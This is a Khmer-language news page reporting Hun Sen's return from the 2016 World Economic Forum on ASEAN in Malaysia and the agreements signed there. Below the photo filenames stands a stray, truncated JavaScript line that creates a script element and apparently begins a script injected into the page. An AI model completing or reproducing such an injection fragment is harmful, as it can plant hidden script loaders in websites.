ព្រឹតិ្តការណ៍ថ្មីៗ

សម្តេចតេជោ ហ៊ុន សែន និងសម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុនសែន បានដឹកនាំគណៈប្រតិភូ ត្រឡប់មកកាន់ប្រទេសកម្ពុជាវិញហើយ

2 ឆ្នាំ មុន 0 តូ សុផល

ភ្នំពេញ៖ នាព្រឹកថ្ងៃទី០៤ ខែមិថុនា ឆ្នាំ២០១៦ នេះ សម្តេចតេជោ ហ៊ុន សែន និងសម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុនសែន បានដឹកនាំគណៈប្រតិភូ ត្រឡប់មកកាន់ប្រទេសកម្ពុជាវិញហើយ បន្ទាប់ពីលោកទាំងពីរ បានបំពេញទស្សកិច្ច និងអញ្ជើញចូលរួមវេទិកាសេដ្ឋកិច្ចពិភពលោក ស្តីពី អាស៊ាន នៅប្រទេសម៉ាឡេស៊ី។

ជាលទ្ធផលនៃដំណើរទស្សនកិច្ច និងការចូលរួមក្នុងវេទិកាសេដ្ឋកិច្ចពិភពលោក ស្តីពី អាស៊ាន នៅប្រទេសម៉ាឡេស៊ីរយះពេល០៤ថ្ងៃនេះគឺសំរេចបានផ្លែផ្កាគួរជាទីមោទនៈបំផុត ។ វេទិកាសេដ្ឋកិច្ចពិភពលោក លើកទី ២៥ ស្តីពីអាស៊ាននេះ បានផ្តល់ឱកាសដ៏ប្រសើរសម្រាប់ប្រមុខដឹកនាំកម្ពុជាក្នុងការចែករំលែកបទពិសោធន៍ និងទស្សនៈនានាជាមួយនឹងមេដឹកនាំរដ្ឋាភិបាល, អង្គការអន្តរជាតិ, ពាណិជ្ជករ និង សង្គមស៊ីវិល ទៅលើវិធីនៃការជម្នះរាល់ការប្រកួតប្រជែងនាពេលបច្ចុប្បន្ន ដើម្បីសម្រេចឲ្យបាននូវនិរន្តរភាពនៃការ អភិវឌ្ឍជារួមនៅក្នុងតំបន់ ជាពិសេសគឺរបៀបនៃការទាញយកប្រយោជន៍សម្រាប់សហគមន៍អាស៊ាន។

សម្តេចតេជោ ហ៊ុន សែន និងសម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ត្រូវបានការធ្វើគារវកិច្ចស្វាគមន៍យ៉ាងស្និតស្នាលរ៉ាក់ទាក់ពីសំណាក់សមភាគីម៉ាឡេស៊ី ឯកឧត្តម ដាតូ ស្រីុ ម៉ូដ ណាជីប ប៊ីន ទួន ហាជី អាប់ឌុល រ៉ាហ្សាក់ (Dato Sri Mohd bin Tun Haji Abdul Razak នាយករដ្ឋមន្រ្តីនៃប្រទេសម៉ាឡេស៊ី និងលោកជំទាវ ។ ដំណើរបំពេញទស្សនកិច្ចផ្លូវការនេះគឺធ្វើឡើងដើម្បីពង្រឹងពង្រីកទំនាក់ទំនងមិត្តភាព និងកិច្ចសហប្រតិបត្តិ ការ លើគ្រប់វិស័យសម្រាប់ប្រទេសទាំងពីរឲ្យកាន់តែរីកចម្រើនរឹងមាំ និងខ្លាំងក្លាថែមទៀត ក្នុងនាមជាប្រទេសស្ថិតនៅក្នុងតំបន់អាស៊ានតែមួយ។ ជាមួយគ្នានោះសម្តេចតេជោ និងសមភាគីនាយករដ្ឋមន្រ្តីម៉ាឡេស៊ី បានអញ្ជើញធ្វើជាសាក្សីនៃពិធីចុះហត្ថលេខាលើឯកសារសំខាន់ៗចំនួន៣ ក្នុងនោះរួមមាន ទី១អនុស្សារណៈនៃការយោគយល់គ្នាស្តីពី កម្មវិធីអ្នកស្ម័គ្រចិត្តអន្តរជាតិនៃ MYCORPS នៅប្រទេសកម្ពុជា ទី២អនុស្សារណៈនៃការយោគយល់គ្នាស្តីពី កិច្ចសហប្រតិបត្តិការលើវិស័យព័ត៌មាន និងការផ្សាយតាមរលកធាតុអាកាស និងទី៣លិខិតបញ្ជាក់បំណង (Letter of Intent) ដើម្បីចុះហត្ថលេខាលើអនុស្សារណៈ នៃការយោគយល់គ្នាស្តីពី កិច្ចសហប្រតិបត្តិការលើវិស៍យកសិកម្មក្នុងពេលខាងមុខ។

13320003_1026876230694207_6041780115882283640_n 13321799_1026876520694178_5178930871696847441_n 13325709_1026876804027483_1048756638636294038_n 13335622_1026876234027540_7877812094982134525_n 13342955_1026876274027536_8974127500269196856_n 13346686_1026877170694113_3805478538555063426_n 13346750_1026876754027488_3196317753834868568_n

var d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ